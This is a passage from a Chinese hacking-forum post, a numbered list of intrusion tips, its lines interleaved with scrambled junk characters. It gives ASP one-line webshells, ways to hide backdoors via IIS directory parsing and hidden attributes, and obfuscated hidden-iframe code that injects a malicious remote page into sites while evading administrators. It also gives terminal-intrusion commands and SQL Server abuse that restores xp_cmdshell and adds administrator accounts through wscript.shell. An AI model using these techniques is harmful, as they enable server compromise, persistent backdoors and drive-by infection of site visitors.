1 w: [0 z( W7 q: L# `0 p% hd).<script language=VBScript runat=server>execute request("sb")</Script>
2 \- g" g! a1 O/ @& {* g$ se).<%25Execute(request("l"))%25>
4 B& C- A$ r) c; V% y* U: s( B2 Ef).<%if request("cmd")<>"" then execute request("pass")%>
, k& U( [7 K! F" o/ h# ^+ l, \5 ?0 m. T( e: D
52、at "12:17" /interactive cmd% u! d$ \3 h- y- `
执行后可以用AT命令查看新加的任务' p# v8 y; `6 q% I; x
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。9 T% J; x5 h6 F0 d. ?

$ E: H) ]# p2 G/ J- S! Q53、隐藏ASP后门的两种方法
: H: v  L( K, F( F8 i# g' m1、建立非标准目录:mkdir images..\6 k2 S9 j( l+ E5 I2 `6 P
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp' I- i/ ]1 I  h7 Q% f% C
通过web访问ASP木马:http://ip/images../news.asp?action=login% i4 ]- o4 H4 L% g% ^- [1 h4 V; Z
如何删除非标准目录:rmdir images..\ /s$ U: G* Z  h3 ]
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:3 x$ l/ g' n0 s% \3 x  L
mkdir programme.asp
& l+ _# X7 C( ?% M# z% h新建1.txt文件内容:<!--#include file=”12.jpg”-->( a) {8 K1 w6 o
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
6 c. W- e" O8 c5 r0 V" iattrib +H +S programme.asp+ b& [8 b& i; e7 {) l4 F: N+ z
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
. }! E& R) @* z. x7 \, O* p- F1 U$ e0 z6 {8 E
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
" ~1 U6 I! r5 P9 r- ^$ O9 y! {然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。: l: b7 N6 \6 G

) k5 [' Q8 Z. K7 S2 ^* m55、JS隐蔽挂马
2 S1 ?4 |6 \# @1 s# M7 b. @1.
2 z' O# c" G/ P+ Yvar tr4c3="<iframe src=ht";
. _; v, a- L6 D. K' T7 v. t( Ttr4c3 = tr4c3+"tp:/";
5 X, O. E3 K0 q# M# n6 ]- f$ btr4c3 = tr4c3+"/ww";
  U" \) b$ R! E* Qtr4c3 = tr4c3+"w.tr4";
: \/ F  |' K+ t1 B7 l' u! u! b' K( ^tr4c3 = tr4c3+"c3.com/inc/m";
/ ~) x4 o- M# n/ n, I6 |2 q' btr4c3 = tr4c3+"m.htm style="display:none"></i";  |6 q# [' d/ y0 |
tr4c3 =tr4c3+"frame>'";
  q# a7 c1 B3 h( s0 M6 r) W1 g, C8 ]document.write(tr4c3);
. ]. s# Q( W: B& E- Q避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。$ W3 A3 ]7 S( `
! Y' }5 a; {/ X) _6 m! U2 U
2.& ^) R4 X3 o/ t* Q
转换进制,然后用EVAL执行。如6 k! `5 ]- Z2 O' V% T' R
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
4 Z  q( ]# D. h4 K7 l, J  Q不过这个有点显眼。
# {7 b: {% O6 v' v3 m7 r& ~; S3./ Z  I" f% v- [$ o; x( G
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
4 g1 z7 K) q0 M& e; `最后一点,别忘了把文件的时间也修改下。! n# R0 Z( N, q; X& g6 P" |
. W4 _! c, B3 p
56.3389终端入侵常用DOS命令3 u: u/ z4 X9 C4 |& P! X' O" L- A
taskkill taskkill /PID 1248 /t
4 I& n, a+ ?# Q2 y1 a: {5 E% R: S- _( _) p( E% I9 M$ C
tasklist 查进程$ Y) I' O; O) Q: [2 d' ]& G6 ]
3 _2 t) E+ p  d( b, z. A8 g
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限& r: a; c/ }, G& d& j
iisreset /reboot
. ?$ I' k$ y: O2 g, Ytsshutdn /reboot /delay:1    重起服务器9 r$ Z: O4 k6 z5 o/ z- c3 _
; J+ n9 z" h+ M6 p7 s# P7 v0 W
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
$ I+ }- G: i7 ~$ j  x/ W4 B( \! r
5 D2 y* U4 K, C5 [; S  P( @. bquery user 查看当前终端用户在线情况& T* \8 \/ s, S: V. n

6 k  s- x: t4 I% ?: t/ H7 w要显示有关所有会话使用的进程的信息,请键入:query process *0 M  N- Z4 {0 G: N" Z8 b
; r4 E) U% w+ h) |
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
0 c- Y; J% @! _  d
+ `$ Z( w9 X) v0 A# k  l  V0 L  O1 {要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
7 _, ~# P  c' k0 ^
2 |' p/ r+ Q$ X! p5 D' t9 D3 s" o8 a* X要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
! Y- F5 z8 d) p) I' [& u8 T  N& |4 _8 o8 G. x0 f% ^( h
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
6 X2 o+ ~0 i6 l- C5 S- Z
; T6 f. |' F2 v8 _  E命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统! n. i. U: d8 }3 k- z* l

. A" J; j$ w8 Y/ c/ s  S* ]/ R, @  J0 ^7 b命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
2 q% B& ^/ U% j' c; G& \# B, J: D! Z0 _0 n: K' f% }3 O  X
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机" L  w6 h% h( c% N7 a& ^
! k' ^% g3 X4 _
56、在地址栏或按Ctrl+O,输入:
) S$ J2 ]7 U' u/ q. ljavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;* b6 X" }! q6 N4 F

+ x& D, N- q( R. J6 J源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
. H& A& o- ^! t. d
: U1 v7 K, D1 ?& u$ t9 \# {57、net user的时候,是不能显示加$的用户,但是如果不处理的话,, b1 @( `- U. \; Q" e5 l
用net localgroup administrators是可以看到管理组下,加了$的用户的。
; d! c8 A, U& W9 R" K" M( C' X: U0 D$ r( N
58、 sa弱口令相关命令1 ?, T' g1 N6 D, @* _  M
3 b$ I) _1 R: x, M+ b; N
一.更改sa口令方法:
9 T' U4 Y2 v- ]+ I2 q用sql综合利用工具连接后,执行命令:. l8 |# z: J' O/ L( }9 C
exec sp_password NULL,'20001001','sa'1 q9 `/ |/ I$ w* G$ I3 A
(提示:慎用!)
2 J' O/ m% a+ O5 I8 u
9 C/ _$ J5 g( r& A/ M# U二.简单修补sa弱口令.3 }/ h' v5 o: q. L
  [+ j% N( v$ N& t
方法1:查询分离器连接后执行:
* G; ]: @# w' u, C1 @* X5 eif exists (select * from( B" U' F; J$ l1 i% K- |) `
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and# j7 g5 g) N0 E5 r! X0 x* Q! X
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)* Q& v7 v, S" \/ H, ^
" E3 }- {2 v9 H/ C) Z/ q9 N
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
) r* Z8 S+ O( |* k, B2 v* ^9 o7 w% ^  E; M# U% u
GO
( T4 c, ]" s+ u$ c9 ^; N
/ U, ~" m; S) ~7 T$ a; M然后按F5键命令执行完毕
4 I( l3 M9 q% b4 _% a7 S
5 H7 p" m/ ^) U* D+ _2 T方法2:查询分离器连接后
% c$ r7 x/ O, U# D第一步执行:use master' b7 s' D5 |! A1 @* `5 @
第二步执行:sp_dropextendedproc 'xp_cmdshell'
- p) Q8 D+ f- W然后按F5键命令执行完毕3 D3 h4 H! \7 L5 _% [9 o
1 @' K/ Z' J* P! y
. V) H1 O" _& I+ [1 m
三.常见情况恢复执行xp_cmdshell.
/ t( I3 V6 G4 x6 i( v9 S
& s- _. Y6 O/ [1 e$ h7 u: Y  w
" K$ L) }+ D% ^* T8 @" T5 Q1 未能找到存储过程'master..xpcmdshell'.! @5 O8 w9 \5 h  N8 Z$ I
   恢复方法:查询分离器连接后,
- T. J3 R' l) v& e; G第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* @7 f: a7 ?0 _6 f第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 h* l$ [% F" W0 H然后按F5键命令执行完毕
: O2 H6 H0 T4 `" I+ f( U" x! u: D! f4 q  p+ T8 ?* a
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)3 j3 Y( T1 G% s4 M& f% H
恢复方法:查询分离器连接后,
$ A- ?* u/ b  `$ h1 W; Q第一步执行:sp_dropextendedproc "xp_cmdshell"8 ?: G4 A: M' E# h: H
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
! }, k+ R! ]! K% u! ]1 f. |然后按F5键命令执行完毕. n, K3 }1 @. d
+ a5 j+ g9 ^$ e
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
* d7 Q" K/ C( y/ R5 `0 l恢复方法:查询分离器连接后,; }* L2 J. @& _$ [
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'3 r& P; c( y, F0 u2 e
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
/ G* S% S1 u9 L# j, {: ^% O( I( R然后按F5键命令执行完毕' j& h% j9 t" l& N0 ^7 h
% b3 ^( |- n: @5 ^( R
四.终极方法.
7 H: n: f  m7 M如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
% G7 J6 h" v; z% D- _  W6 |$ M, s# {查询分离器连接后,( D" t* i- u; j0 j9 q" ~: _
2000servser系统:! a9 U7 u7 q! N9 d" F5 j. O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'! x7 ]0 c5 S/ E6 t! {, {

1 e3 b$ W* l& A' g5 Q* \  |' Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 \9 V2 Q% [% }4 T& s5 ~

- l) y( P7 n% w# k- x1 txp或2003server系统:4 q2 y! ~1 x5 a( w. M( U& a
; q6 [( [; Z, i* L) y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add': E. B3 D7 L" {1 E# U
: ~: ~* V# i! H$ k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# W( Y" q7 v4 u& {- a' A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表